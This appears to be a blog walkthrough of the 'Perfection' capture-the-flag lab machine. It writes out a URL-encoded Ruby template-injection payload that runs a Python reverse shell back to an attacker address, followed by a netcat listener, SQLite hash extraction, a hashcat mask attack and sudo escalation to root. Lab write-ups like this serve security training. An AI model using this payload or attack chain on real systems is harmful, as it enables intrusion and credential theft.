Command Palette

Search for a command to run...

Blog
PreviousNext

Perfection - Walkthrough

Perfection is an easy Linux machine that features a web application with functionality to calculate student scores. This application is vulnerable to Server-Side Template Injection (SSTI) via regex filter bypass. A foothold can be gained by exploiting the SSTI vulnerability. Enumerating the user reveals they are part of the sudo group. Further enumeration uncovers a database with password hashes, and the user's mail reveals a possible password format. Using a mask attack on the hash, the user's password is obtained, which is leveraged to gain root access.

Reconnaissance

We begin with an Nmap scan to identify open services:

sudo nmap -p- -n -Pn --disable-arp-ping -sS -sV -sC -vvv -T5 10.10.11.253 -oN perfection

The scan reveals:

PORTSTATESERVICEVERSION
22/tcpopensshOpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcpopenhttpnginx

Visiting the web service, we find a grade calculator application:

10.10.11.253/weighted-grade

Using Wappalyzer, we identify the technology stack as Ruby (WEBrick 1.7.0).

Exploitation

We test the application for Server-Side Template Injection (SSTI). After intercepting requests with BurpSuite, we craft payloads to bypass input filters.

burpsuite repeater

Testing with ERB (Ruby) payloads from HackTricks, we achieve RCE. We URL-encode a Python reverse shell:

category%0a<%25%3d+`python3+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.14.58",5000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3bos.dup2(s.fileno(),2)%3bimport+pty%3b+pty.spawn("bash")'`+%25>

We set up a listener and execute the payload:

nc -lvnp 5000

revershell

We stabilize the shell and capture the user flag:

cat ~/user.txt

User flag: bfd33f2d5e72f0e6de3699e3bf0004bc

Privilege Escalation

Inside the user's home directory, we find a Migration folder containing a SQLite database:

susan@perfection:~/Migration$ file pupilpath_credentials.db
pupilpath_credentials.db: SQLite 3.x database

We extract user credentials:

sqlite3 pupilpath_credentials.db
sqlite> select * from users;
1|Susan Miller|abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f
2|Tina Smith|dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57
3|Harry Tyler|d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393
4|David Lawrence|ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a
5|Stephen Locke|154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8

Reading /var/mail/susan reveals a password format:

{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}

Using hashcat with a mask attack, we crack Susan's hash:

hashcat -a 3 -m 1400 abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f "susan_nasus_?d?d?d?d?d?d?d?d?d" --show
abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f:susan_nasus_413759210

We check sudo privileges:

sudo -l
User susan may run the following commands on perfection:
    (ALL : ALL) ALL

Susan can run any command as root. We escalate to root:

susan@perfection:/var/mail$ sudo bash

We capture the root flag:

cat ~/root.txt

Root flag: ea927a4fe65ba5eaf2323d5b7d22a061